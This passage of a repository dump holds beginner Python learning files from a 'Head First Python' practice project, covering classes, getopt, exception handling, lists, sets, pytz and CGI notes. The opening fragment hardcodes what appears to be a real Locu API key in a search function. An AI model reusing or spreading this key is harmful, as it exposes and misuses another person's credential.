"text": "import urllib2\nimport json\n\nlocu_api = '2e09f433bee28825bbcdae393e3e4168e1851da9'\n\ndef locu_search(query):\n api_key = locu_api\n url = 'https://api.locu.com/v1_0/venue/search/?api_key=' + api_key\n locality = query\n final_url = url + \"&locality=\" + locality\n json_obj = urllib2.urlopen(final_url)\n data = json.load(json_obj)\n\n for item in data['objects']:\n print \"item is:\" + item['name']\n\n\n\n"
}
] | 1 |
flyingbest/head-first-python
|
https://github.com/flyingbest/head-first-python
|
ff507027cb3a5e19de33a184c8f9e8aa03fd41e6
|
b5df6854c93f5afc75395383daca23bb175359b0
|
b0f239b25f055bd8964a2b2aabb79530380f63b6
|
refs/heads/master
| 2021-01-20T05:40:01.526335 | 2017-03-13T05:16:39 | 2017-03-13T05:16:39 | 83,861,417 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6313065886497498,
"alphanum_fraction": 0.6442431807518005,
"avg_line_length": 18.982759475708008,
"blob_id": "7a3717e481bb9314bc9c9dbb4d64f06df7f2b2f4",
"content_id": "c9518509804d6bd147d673d7da0309ce0e624ba9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2319,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 116,
"path": "/tutorial/class.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Class\nclass Student:\n\tname = 'ansxodbs'\n\tdef info(self):\n\t\tprint(\"My name is \" + self.name + \". \")\n\ninst = Student()\n\nprint(type(inst))\nprint(inst.name)\ninst.info()\n\nclass Book:\n\t# Constructor\n\tdef __init__(self, BookName):\n\t\tself.name = BookName\n\t\tprint(\"object is constructed. The book name is \" + self.name + \". \")\n\t# Destructor\n\tdef __del__(self):\n\t\tprint(\"object \" + self.name + \" is destructed.\")\n\nobjectBook = Book('Python3 programming')\ndel objectBook\n\n\n# Inheritance\nclass Person:\n\tdef __init__(self, name, age, gender):\n\t\tself.Name = name\n\t\tself.Age = age\n\t\tself.Gender = gender\n\tdef printInfo(self):\n\t\tprint(\"My name is \" + self.Name + \". I am \" + str(self.Age) + \" years old.\")\n\nclass Employee(Person):\n\tdef __init__(self, name, age, gender, salary, hiredate):\n\t\tPerson.__init__(self, name, age, gender)\n\t\tself.Salary = salary\n\t\tself.Hiredate = hiredate\n\tdef doWork(self):\n\t\tprint(\"I'm working hard!\")\n\tdef printInfo(self):\n\t\tPerson.printInfo(self)\n\t\tprint(\"My salary is \" + str(self.Salary) + \" dollars. And My hiredate is \" + self.Hiredate + \".\")\n\nobjectEmployee = Employee(\"ansxodbs\", 20, \"man\", 50000000, \"04-05-2017\")\nobjectEmployee.doWork()\nobjectEmployee.printInfo()\n\n\n# Multiple Inheritance\nclass ParentOne:\n\tdef func(self):\n\t\tprint(\"call func of ParentOne!\")\n\nclass ParentTwo:\n\tdef func(self):\n\t\tprint(\"call func of ParentTwo!\")\n\nclass Child(ParentOne, ParentTwo):\n\tdef childFunc(self):\n\t\tParentOne.func(self)\n\t\tParentTwo.func(self)\n\t\tprint(\"call func of child!\")\n\nobjectChild = Child()\nobjectChild.childFunc()\nprint()\nobjectChild.func()\nprint()\n\nclass A:\n\tdef __init__(self):\n\t\tprint(\"call constructor of A class\")\n\nclass B(A):\n\tdef __init__(self):\n\t\t#A.__init__(self)\n\t\tsuper().__init__()\n\t\tprint(\"call constructor of B class\")\n\nclass C(A):\n\tdef __init__(self):\n\t\t#A.__init__(self)\n\t\tsuper().__init__()\n\t\tprint(\"call constructor of C class\")\n\nclass D(B, C):\n\tdef __init__(self):\n\t\t#B.__init__(self)\n\t\t#C.__init__(self)\n\t\tsuper().__init__()\n\t\tprint(\"call constructor of D class\")\n\nobjectD = D()\n\n\n# Operator Overloading\nclass Numbox:\n\tdef __init__(self, num):\n\t\tself.Num = num\n\tdef __add__(self, num):\n\t\tself.Num += num\n\tdef __radd__(self, num):\n\t\tself.Num += num\n\tdef __sub__(self, num):\n\t\tself.Num -= num\n\nn = Numbox(50)\nn + 100\nprint(n.Num)\n100 + n\nprint(n.Num)\nn - 110\nprint(n.Num)\nprint()\n\n"
},
{
"alpha_fraction": 0.6775495409965515,
"alphanum_fraction": 0.6793836951255798,
"avg_line_length": 36.84722137451172,
"blob_id": "9868bef3717720a0e49839c6e387a99e6cb502e6",
"content_id": "73fd71968f46962161b02318f45856f486a3e0aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2826,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 72,
"path": "/tutorial/getopt_test.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# getopt - C-style parser for command line options.\n\n# this module helps scripts to parse the command line arguments in sys.argv.\n\n# This module provides two functions and an exception:\n# \tgetopt.getopt(args, shortopts, longopts=[])\n\n\"\"\"\nargs is the argument list to be parsed, without the leading reference to the runnig program.\nTypically, this means sys.argv[1:]. shortopts is the string of option letters that the script wants to recognize,\nwith options that require an argument followed by a colon.\n\nlongopts, if specified, must be a list of strings with the names of the long options which should be supported.\nThe leading '--' characters should not be included in the option name. Long options which require an argument should be followed by an equal sign ('=').\nOptional arguments are not supported.\n\nThe return value consists of two elements: \n\tthe first is a list of (option, value) pairs;\n\tthe second is the list of program arguments left after the option list was stripped (this is a trailing slice of args).\nEach option-and-value pair returned has the option as its first element,\nprefixed with a hyphen for short options (e.g., '-x') or two hyphens for long options (e.g., '--long-option'),\nand the option argument as its second element, or an empty string if the option has no argument.\nThe options occur in the list in the same order in which they were found, thus allowing multiple occurrences.\nLong and short options may be mixed.00\n\"\"\"\n\n# \tgetopt.gnu_getopt(args, shortopts, longopts=[])\n# This function works like getopt(), except that GNU style scanning mode is used by default.\n\n# exception:\n# \tgetopt.GetoptError\n# \t- This is raised when an unrecognized option is found in the argument list or when an option requiring an argument is given none.\n# \tgetopt.error\n# \t- Alias for GetoptError;\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------\n\n# First Error Point. Not executed.\n# Because,\n# You might be have getopt module in your code.\n# When you refere python third party module, it try to import your module.\n\n# this is typical usage script.\nimport getopt, sys\n\ndef main():\n\ttry:\n\t\topts, args = getopt.getopt(sys.argv[1:], \"ho:v\", [\"help\", \"output=\"])\n\texcept getopt.GetoptError as err:\n\t\tprint(err)\n\t\tusage()\n\t\tsys.exit(2)\n\toutput = None\n\tverbose = False\n\tfor o, a in opts:\n\t\tif o == \"-v\":\n\t\t\tverbose = True\n\t\telif o in (\"-h\", \"--help\"):\n\t\t\tusage()\n\t\t\tsys.exit()\n\t\telif o in (\"-o\", \"--output\"):\n\t\t\toutput = a\n\t\telse:\n\t\t\tassert False, \"unhandled option\"\n\nif __name__ == \"__main__\":\n\tmain()\n\n### 한글 추가\n### 옵션 문자에 :가 사용되면 옵션에 추가의 인수를 받아들인다는 의미!\n### abc:de:\n### 라면 a,b,d 는 단독옵션이고, c,e 는 인수를 갖는 옵션이다.\n\n"
},
{
"alpha_fraction": 0.6648721694946289,
"alphanum_fraction": 0.6672947406768799,
"avg_line_length": 23.11688232421875,
"blob_id": "2b0df77055d053188a976e2d4ef457d6817c59df",
"content_id": "825e7e0748c939c352293fa8f7450501564bbb66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3715,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 154,
"path": "/03-errors/errors.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Dealing with errors\n\n# It's all lines of text\n\"\"\"\nThe basic input mechanism in Python is line based:\nwhen read into your program from a text file, data arrives one line at a time.\n\nPython's open() BIF lives to interact with files. When combined with a for statement, reading files is straightforward.\n\"\"\"\n\nthe_file = open('sketch.txt')\n# Do something with the data\n# in \"the_file\".\n\n\"\"\"\nfor each_line in the_file:\n\t(role, line_spoken) = each_line.split(':')\n\tprint(role, end='')\n\tprint(' said: ', end='')\n\tprint(line_spoken, end='')\n\"\"\"\n\n# error : too many values to unpack\n# Know your methods and ask for help\n\"\"\"\nIt might be useful to see if the split() method includes any functionality that might help here.\nYou can ask the IDLE shell to tell you more about the spilt() method by using the help() BIF.\n\"\"\"\n\n\"\"\"\nfor each_line in the_file:\n\t(role, line_spoken) = each_line.split(':', 1)\n\tprint(role, end='')\n\tprint(' said: ', end='')\n\tprint(line_spoken, end='')\n\"\"\"\n\n# Add extra logic\n\ndata = \"I tell you, there's no such thing as a flying circus.\"\nprint(data.find(':'))\n# the string does NOT contain a colon, so find() returns -1 for NOT FOUND.\n\n\"\"\"\nfor each_line in the_file:\n\tif not each_line.find(':') == -1:\n\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\tprint(role, end='')\n\t\tprint(' said: ', end='')\n\t\tprint(line_spoken, end='')\n\"\"\"\n\n\n# Handle exceptions\n\"\"\"\nThe traceback is Python's way of telling you that something unexpected has occurred during runtime.\nIn the Python world, runtime errors are called exceptions.\n\"\"\"\n\n# The try/except mechanism\n\"\"\"\nPython includes the try statement, which exist to provide you with a way to systematically handle exceptions and errors at runtime.\nThe general form of the try statement looks like this:\n\"\"\"\n\n# try :\n#\t\t\t\tyour code (which might cause a runtime error)\n# except:\n# \t\t\tyour error-recovery code\n\n\"\"\"\nfor each_line in the_file:\n\ttry:\n\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\tprint(role, end='')\n\t\tprint(' said: ', end='')\n\t\tprint(line_spoken, end='')\n\texcept:\n\t\tpass\t# if a runtime error occurs, this code is executed.\n\"\"\"\n\n# Which is better? Extra code, Exception handler\n\n\n# What about other errors?\n# Handling missing files\n\n\"\"\"\n#import os\n#if os.path.exist('/sketch.txt'):\n#\tthe_file = open('sketch.txt')\n\n\tfor each_line in the_file:\n\t\tif not each_line.find(':') == -1:\n\t\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\t\tprint(role, end='')\n\t\t\tprint(' said: ', end='')\n\t\t\tprint(line_spoken, end='')\n\t\n#\tthe_file.close()\n#else:\n#\tprint('The data file is missing!')\n\"\"\"\n\n\"\"\"\n#try:\n#\tthe_file = open('sketch.txt')\n\n\tfor each_line in the_file:\n\t\ttry:\n\t\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\t\tprint(role, end='')\n\t\t\tprint(' said: ', end='')\n\t\t\tprint(line_spoken, end='')\n\t\texcept:\n\t\t\tpass\n\n#\tthe_file.close()\n#except:\n#\tprint('The data file is missing!')\n\"\"\"\n\n# So, which approach is best? 
fiist one or second one?\n\n# Complexity is rarely a good thing\n\"\"\"\nBy using Python's exception-handling mechanism, you get to concentrate on what your code needs to do,\nas opposed to worrying about what can go wrong and writing extra code to avoid runtime errors.\n\"\"\"\n\n# Last, You need to somehow use except in a less generic way.\n\n\"\"\"\n#try:\n#\tthe_file = open('sketch.txt')\n\n\tfor each_line in the_file:\n\t\ttry:\n\t\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\t\tprint(role, end='')\n\t\t\tprint(' said: ', end='')\n\t\t\tprint(line_spoken, end='')\n\t\texcept ValueError:\n\t\t\tpass\n\n#\tthe_file.close()\n#except IOError:\n#\tprint('The data file is missing!')\n\"\"\"\n# Be specific with your exceptions\n# If your exception-handling code is designed to deal with a specific type of error,\n# be sure to specific the error type on the except line.\n\nthe_file.close()\n\n"
},
{
"alpha_fraction": 0.6724057793617249,
"alphanum_fraction": 0.6849697828292847,
"avg_line_length": 22.615385055541992,
"blob_id": "b03c4a60357effa277cf5f32260e4460992b72dd",
"content_id": "4e0825419b336370b64bdfd5ad3a5bfe8dee247f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2149,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 91,
"path": "/01-lists/lists.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# This is python practicing code.\n\n## Add more data in the list.\ncast = [\"Cleese\", \"Palin\", \"Jones\", \"Idle\"]\t# cast is variable.\nprint(cast)\nprint(len(cast))\t# len = length\nprint(cast[1])\t# cast[0] = Cleese, cast[1] = Palin, like this, python starts counting from ZERO.\n\ncast.append(\"Gilliam\")\t# add a single data item to the end of your list.\nprint(cast)\n\ncast.pop()\t# remove data from the end of your list.\nprint(cast)\n\ncast.extend([\"Gilliam\", \"Chapman\"])\t# add a collection of data items to the end of your list.\nprint(cast)\n\ncast.remove(\"Chapman\")\t# remove a specific data item from your list.\nprint(cast)\n\ncast.insert(0, \"Chapman\")\t# add a data item before a specific slot location.\nprint(cast)\n\nmovies = [\"The Holy Grail\", \"The Life of Brain\", \"The Meaning of Life\"]\nprint(movies)\n\nmovies.insert(1, 1975)\nmovies.insert(3, 1979)\nmovies.insert(5, 1983)\n\nprint(movies)\n\n\n## iterate with the list data.\nfav_movies = [\"Holy Grail\", \"Life of Brain\"]\n\nfor each_flick in fav_movies:\t# each_flick is a target identifier\n\tprint(each_flick)\n\n# for <target identifier> in <list>:\n#\t\t<list-processing code...>\n\ncount = 0\nwhile count < len(fav_movies):\n\tprint(fav_movies[count])\n\tcount = count + 1\n# these while and for statements do the same thing.\n\n\n## handle many levels of nested lists.\nmovies = [\"The Holy Grail\", 1975, \"Terry Jones & Terry Gilliam\", 91,\n\t\t\t\t\t\t[\"Graham Chapman\", [\"Michael Palin\", \"John Cleese\", \"Terry Gilliam\", \"Eric Idle\", \"Terry Jones\"]]]\n\nprint(movies)\n\n# first step\nfor each_item in movies:\n\tprint(each_item)\n\n# second step\nfor each_item in movies:\n\tif isinstance(each_item, list):\n\t\tfor nested_item in each_item:\n\t\t\tprint(nested_item)\n\telse:\n\t\tprint(each_item)\n\n# third step\nfor each_item in movies:\n\tif isinstance(each_item, list):\n\t\tfor nested_item in each_item:\n\t\t\tif isinstance(nested_item, list):\n\t\t\t\tfor deeper_item in nested_item:\n\t\t\t\t\tprint(deeper_item)\n\t\t\telse:\n\t\t\t\tprint(nested_item)\n\telse:\n\t\tprint(each_item)\n\n\n## Don't repeat code: create a function\ndef print_lol(the_list):\n\tfor each_item in the_list:\n\t\tif isinstance(each_item, list):\n\t\t\tprint_lol(each_item)\n\t\telse:\n\t\t\tprint(each_item)\n# this called Recursion.\n# this is recursive function.\n\nprint_lol(movies)\n"
},
{
"alpha_fraction": 0.6951034665107727,
"alphanum_fraction": 0.7083964347839355,
"avg_line_length": 25.765766143798828,
"blob_id": "602e05c834783a16da71e3167f7da263dfec98a6",
"content_id": "bf937c42b35ce25241a3f5503762558656e054ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5943,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 222,
"path": "/05-data/data.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Work that data\n\nwith open('james.txt') as jaf:\n\tdata = jaf.readline()\njames = data.strip().split(',')\n\nwith open('julie.txt') as juf:\n\tdata = juf.readline()\njulie = data.strip().split(',')\n\nwith open('mikey.txt') as mif:\n\tdata = mif.readline()\nmikey = data.strip().split(',')\n\nwith open('sarah.txt') as saf:\n\tdata = saf.readline()\nsarah = data.strip().split(',')\n\n\"\"\"\nprint(james)\nprint(julie)\nprint(mikey)\nprint(sarah)\n\"\"\"\n\n\n# Sort in one of two ways\n\"\"\"\nIn-place sorting takes your data, arranges it in the order you specify, and then replaces your original data with the sorted version.\nThe original ordering is lost. With lists, the sort() method provides in-place sorting:\n\nCopied sorting takes your data, arranges it in the order you specify, and then returns a sorted copy of your original data.\nYour original data's ordering is maintained and only the copy is sorted. In Python, the sorted() BIF supports copied sorting.\n\"\"\"\n\n\"\"\"\ndata = [6,3,1,2,4,5]\nprint(data)\n\ndata.sort()\nprint(data)\n\ndata1 = [6,3,1,2,4,5]\nprint(data1)\n\ndata2 = sorted(data1)\nprint(data1)\nprint(data2)\n\"\"\"\n\n\"\"\"\nprint(sorted(james))\nprint(sorted(julie))\nprint(sorted(mikey))\nprint(sorted(sarah))\n\"\"\"\n\n# Nonuniformity in the coach's data is causing the sort to fail.\n\ndef sanitize(time_string):\n\tif '-' in time_string:\n\t\tsplitter = '-'\n\telif ':' in time_string:\n\t\tsplitter = ':'\n\telse:\n\t\treturn(time_string)\n\t(mins, secs) = time_string.split(splitter)\n\n\treturn(mins + '.' + secs)\n\nclean_james = []\nclean_julie = []\nclean_mikey = []\nclean_sarah = []\n\nfor each_t in james:\n\tclean_james.append(sanitize(each_t))\n\nfor each_t in julie:\n\tclean_julie.append(sanitize(each_t))\n\nfor each_t in mikey:\n\tclean_mikey.append(sanitize(each_t))\n\nfor each_t in sarah:\n\tclean_sarah.append(sanitize(each_t))\n\n\"\"\"\nprint(sorted(clean_james))\nprint(sorted(clean_julie))\nprint(sorted(clean_mikey))\nprint(sorted(clean_sarah))\n\"\"\"\n\n# By default, both the sort() method and the sorted() BIF order your data in ascending order.\n# To order your data in descending order, pass the reverse=True argument to either sort() or sorted() and Python will take care of things for you.\n\n# Duplicated code is problem. -> better way to write code (list comprehension)\n\n# Comprehending lists\n\"\"\"\nConsider what you need to do when you transform one list into another. Four things have to happen. You need to:\n\t1. create a new list to hold the transformed data.\n\t2. iterate each data item in the original list.\n\t3. with each iteration, perform the transformation.\n\t4. 
append the transformed data to the new list.\n\nHere's the same functionality as a list comprehension, which involves creating a new list by specifying the transformation that is to be applied to each\nof the data items within an existing list.\n\nclean_mikey = [sanitize(each_t) for each_t in mikey]\n\nwhat's interesting is that the transformation has been reduced to a single line of code.\nAdditionally, there's no need to specify the use of the append() method as this action is implied within the list comprehension.\n\"\"\"\n\nmins = [1,2,3]\nsecs = [m*60 for m in mins]\nprint(secs)\n\nmeter = [1,10,3]\nfeet = [m*3.281 for m in meter]\nprint(feet)\n\nlower = [\"I\", \"don't\", \"like\", \"spam\"]\nupper = [s.upper() for s in lower]\nprint(upper)\n\ndirty = ['2-22', '2:22', '2.22']\nclean = [sanitize(t) for t in dirty]\nprint(clean)\n\nclean = [float(s) for s in clean]\nprint(clean)\n\nclean = [float(sanitize(t)) for t in ['2-22', '3:33', '4.44']]\nprint(clean)\n\n\"\"\"\nprint(sorted([sanitize(t) for t in james]))\nprint(sorted([sanitize(t) for t in julie]))\nprint(sorted([sanitize(t) for t in mikey]))\nprint(sorted([sanitize(t) for t in sarah]))\n\"\"\"\n\n# Iterate to remove duplicates\n# list slice:\n\n\"\"\"\njames = sorted([sanitize(t) for t in james])\njulie = sorted([sanitize(t) for t in julie])\nmikey = sorted([sanitize(t) for t in mikey])\nsarah = sorted([sanitize(t) for t in sarah])\n\nunique_james = []\nfor each_t in james:\n\tif each_t not in unique_james:\n\t\tunique_james.append(each_t)\n\nprint(unique_james[0:3])\n\nunique_julie = []\nfor each_t in julie:\n\tif each_t not in unique_julie:\n\t\tunique_julie.append(each_t)\n\nprint(unique_julie[0:3])\n\nunique_mikey = []\nfor each_t in mikey:\n\tif each_t not in unique_mikey:\n\t\tunique_mikey.append(each_t)\n\nprint(unique_mikey[0:3])\n\nunique_sarah = []\nfor each_t in sarah:\n\tif each_t not in unique_sarah:\n\t\tunique_sarah.append(each_t)\n\nprint(unique_sarah[0:3])\n\"\"\"\n\n\n# Remove duplicates with sets\n\"\"\"\nIn addition to lists, Python also comes with the set data structure, which behaves like the sets you learned all about in math class.\nThe overriding characteristics of sets in Python are that the data items in a set are unordered and duplicates are not allowed.\nIf you try to add a data item to a set that already contains the data item, Python simply ignores it.\nCreate an empty set using the set() BIF, which is an example of a factory function:\n\tdistances = set()\nIt is also possible to create and populate a set in one step. 
You can provide a list of data values between curly braces or specify an existing list\nas an argument to the set() BIF, which is the factory function:\n\tdistances = {10.6, 11, 8, 10.6, \"two\", 7}\n\tdistances = set(james)\n\n\"\"\"\n\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\treturn(data.strip().split(','))\n\texcept IOError as ioerr:\n\t\tprint('File error: ' + str(ioerr))\n\t\treturn(None)\n\nsarah = get_coach_data('sarah.txt')\n\nprint(sorted(set([sanitize(t) for t in james]))[0:3])\nprint(sorted(set([sanitize(t) for t in julie]))[0:3])\nprint(sorted(set([sanitize(t) for t in mikey]))[0:3])\nprint(sorted(set([sanitize(t) for t in sarah]))[0:3])\n\n\n# Python Lingo\n\"\"\"\nMethod Chaining - reading from left to right, applies a collection of methods to data.\nFunction Chaining - reading from right to left, applies a collection of functions to data.\nA 'slice' - access more than one item from a list.\nA 'set' - a collection of unordered data items that contains no duplicates.\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.7139272093772888,
"alphanum_fraction": 0.7239648699760437,
"avg_line_length": 23.90625,
"blob_id": "359cde43e6ddd16df9c99c0ce61ad175c79c61ae",
"content_id": "b9b7c2100103a0adf85032f53327cc7349637a74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 797,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 32,
"path": "/09-handle/handle.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Handling input\n\n# Create an HTML form template\n\"\"\"\ncreating file:\n\ttemplates/form.html\n\tcgi-bin/process-time.py\t\t\t//cgi script chmod +x\t\t//no need to.\n\nwrite the code for two func to add to yate.py\n\tcreate_inputs()\n\tdo_form()\t\n\ncreating file:\n\tcgi-bin/test_form.py\t\t\t//cgi script chmod +x\n\nEnter the URL for the CGI script :\n\thttp://localhost:8080/cgi-bin/test_form.py\n\"\"\"\n\n# The data is delivered to your CGI script\n\"\"\"\ncreating file:\n\tnew CGI script called add_timing_data.py\t\t//cgi script chmod +x\n\nEnter the URL for the CGI script :\n\thttp://localhost:8080/cgi-bin/test_form.py\n\nInput some data into your web form. And check the web browser.\nThe web server's logging screen displays the data that arrived, as well as the name associated with it. \n\"\"\"\n\n# Next, experience on an Android phone.\n"
},
{
"alpha_fraction": 0.7255772352218628,
"alphanum_fraction": 0.7255772352218628,
"avg_line_length": 19.851852416992188,
"blob_id": "270b5ba909adf0360ffe0fb9e8c7789e3831950e",
"content_id": "4d1669d53f9aef8e7d9ce36f2b5a41d992dc2b12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1202,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 54,
"path": "/tutorial/datetime-tutorial.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# basic datetime\n\nimport datetime\n\"\"\"\nCurrentDate = datetime.date.today()\nprint(datetime.date.today())\nprint(CurrentDate)\nprint(datetime.date)\n\nprint(CurrentDate.year)\nprint(CurrentDate.month)\nprint(CurrentDate.day)\n\"\"\"\n\n# advanced datetime \n\nimport pytz\n\n# all_timezones -> all timezone list. \nfor tz in pytz.all_timezones:\n\tif \"Asia/Seoul\" in tz:\n\t\tprint(tz)\n\n# all_timezones_set -> all timezone set.\nfor tz in pytz.all_timezones_set:\n\tif \"Asia/Seoul\" in tz:\n\t\tprint(tz)\n\n# 국가코드로 국가이름, 타임존 조회\nprint(pytz.country_names['KR'])\nprint(pytz.country_timezones('KR'))\nprint(pytz.country_names['US'])\nprint(pytz.country_timezones('US'))\n\n# 타임존 으로 하나의 타임존 인스턴스를 생성하는 함수\nfor tzs in pytz.all_timezones:\n\tif 'Asia/Seoul' in tzs:\n\t\ttzs_seoul = tzs\n\t\tbreak\n\na = pytz.timezone(tzs_seoul)\nprint(type(a))\nprint(a)\n\n# UTC 적용(pytz.UTC)\nprint(type(pytz.UTC))\nprint(pytz.UTC.__class__.__class__)\nprint(pytz.UTC.dst(datetime.datetime.today()))\nprint(pytz.UTC.localize(datetime.datetime.today()))\nprint(pytz.UTC.tzname(datetime.datetime.today()))\nprint(pytz.UTC.utcoffset(datetime.datetime.today()))\nprint(pytz.UTC.zone)\n\n# more about slideshare.\n"
},
{
"alpha_fraction": 0.7704917788505554,
"alphanum_fraction": 0.7745901346206665,
"avg_line_length": 29.5,
"blob_id": "2a2fcc50dacc8870178a988f74351eb8e9934fb8",
"content_id": "dc9b5dfb7b7e80ffb50a04e421b2300876e3f66a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 244,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 8,
"path": "/tutorial/README.md",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Python3 tutorials.\n\nThis repository is what I needed for teaching my friend.\n\n### command-line options, arguments\n\nAfter testing, my friend need simple command-line arguments. not getopt and argparse. \nMake a basic form of driver.py script.\n"
},
{
"alpha_fraction": 0.6693425178527832,
"alphanum_fraction": 0.6795361638069153,
"avg_line_length": 25.600000381469727,
"blob_id": "8c57c6516386bd20674bb4b77ff1a844f6efa9e7",
"content_id": "809b106a24e0004aaae219f54a7bda76fc793f00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7848,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 295,
"path": "/06-bundle/bundle.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Bundling code with data\n\ndef sanitize(time_string):\n\tif '-' in time_string:\n\t\tsplitter = '-'\n\telif ':' in time_string:\n\t\tsplitter = ':'\n\telse:\n\t\treturn(time_string)\n\n\t(mins, secs) = time_string.split(splitter)\n\treturn(mins + '.' + secs)\n\n\"\"\"\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\treturn(data.strip().split(','))\n\texcept IOError as ioerr:\n\t\tprint('File error: ' + str(ioerr))\n\t\treturn(None)\n\"\"\"\n\n\"\"\"\nsarah = get_coach_data('sarah2.txt')\n(sarah_name, sarah_dob) = sarah.pop(0), sarah.pop(0)\nprint(sarah_name + \"'s fastest time are: \" + str(sorted(set([sanitize(t) for t in sarah]))[0:3]))\n\"\"\"\n\n# this code is for loop for print.\nsample = ['james2.txt', 'julie2.txt', 'mikey2.txt', 'sarah2.txt']\n\n\"\"\"\nfor each_item in sample:\n\tarr = get_coach_data(each_item)\n\t(arr_name, arr_dob) = arr.pop(0), arr.pop(0)\n\tprint(arr_name + \"'s fastest time are: \" + str(sorted(set([sanitize(t) for t in arr]))[0:3]))\n\"\"\"\n\n\n# Use a dictionary to associate data\n\"\"\"\nDictionary A built-in data structure (included with Python) that allows you to associate data with keys, as opposed to numbers.\nThis lets your in-memory data closely match the structure of your actual data.\n\"\"\"\n\n\"\"\"\ncleese = {}\npalin = dict()\nprint(type(cleese))\nprint(type(palin))\n\ncleese['Name'] = 'John Cleese'\ncleese['Occupations'] = ['actor', 'comedian', 'writer', 'film producer']\npalin = {'Name': 'Michael Palin', 'Occupations': ['comedian', 'actor', 'writer', 'tv']}\n\nprint(palin['Name'])\nprint(palin['Occupations'][-1])\t\t# tv\nprint(cleese['Occupations'][-1])\t# film producer\n\n# provide the data asociated with the new key.\npalin['Birthplace'] = \"Broomhill, Sheffield, England\"\ncleese['Birthplace'] = \"Weston-super-Mare, North Somerset, England\"\n\nprint(palin)\nprint(cleese)\n\"\"\"\n\n# Unlike lists, a Python dictionary does not maintain insertion order, which can result in some unexpected behavior.\n# The key point is that the dictionary maintains the associations, not the ordering.\n\n\"\"\"\nfor each_item in sample:\n\tarr = get_coach_data(each_item)\n\tarr_data = {}\n\tarr_data['Name'] = arr.pop(0)\n\tarr_data['DOB'] = arr.pop(0)\n\tarr_data['Times'] = arr\n\tprint(arr_data['Name'] + \"'s fastest times are: \" + str(sorted(set([sanitize(t) for t in arr_data['Times']]))[0:3]))\n\"\"\"\n\n# improve get_coach_data function\n\n\"\"\"\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\ttempl = data.strip().split(',')\n\t\treturn({'Name'\t:\ttempl.pop(0),\n\t\t\t\t\t\t'DOB'\t\t: templ.pop(0),\n\t\t\t\t\t\t'Times'\t: str(sorted(set([sanitize(t) for t in templ]))[0:3])})\n\texcept IOError as ioerr:\n\t\tprint('File error: ' + str(ioerr))\n\t\treturn(None)\n\nfor each_item in sample:\n\tarr = get_coach_data(each_item)\n\tprint(arr['Name'] + \"'s fastest times are: \" + arr['Times'])\n\"\"\"\n\n\n# Bundle your code and its data in a class\n\"\"\"\nLike the majority of other modern programming languages, Python lets you create and define an object-oriented class\nthat can be used to asscociate code with the data that it operates on.\n\nUsing a class helps reduce complexity.\nReduced complexity means fewer bugs.\nFewer bugs means more maintainable code.\n\"\"\"\n\n# Define a class\n\"\"\"\nOnce this definition is in place, you can use it to create (or instantiate) data objects, which inherit their characteristics from your 
class.\nWithin the object-oriented world, your code is often referred to as the class's methods, and your data is often referred to as its attributes.\nInstantiated data objects are often referred to as instance.\n\"\"\"\n\n# Use class to define classes\n\"\"\"\nPython uses class to create objects. Every defined class has a special method called __init__(), which allows you to control how objects are initialized.\nHere's the basic form:\n\"\"\"\n# class Athlete:\n# \tdef __init__(self):\n#\t\t\t# The code to initialize an \"Athlete\" object.\n#\t\t\t\t...\n\n# Creating object instances\n# a = Athlete()\n# b = Athlete()\n\n# The importance of self\n\"\"\"\nTo confirm: when you define a class you are, in effect, defining a custom factory function that you can then use in your code to create instance:\n# a = Athlete()\n\nWhen Python processes this line of code, it turns the factory function call into the following call, which identifies the class, the method\n( which is automatically set to __init__() ) and the object instance being operated on:\n# Athlete.__init__(a) //a is the target identifier of the object instance.\n\nNow take another look at how the __init__() method was defined in the class:\n# def __init__(self):\n#\t\t# The code initialize an \"Athlete\" object.\n#\t\t\t...\n\"\"\"\n# The target identifier is assigned to the self argument.\n\"\"\"\nThis is a very important argument assignment. Without it, the Python interpreter can't work out which object instance to apply the method invocation to.\nNote that the class 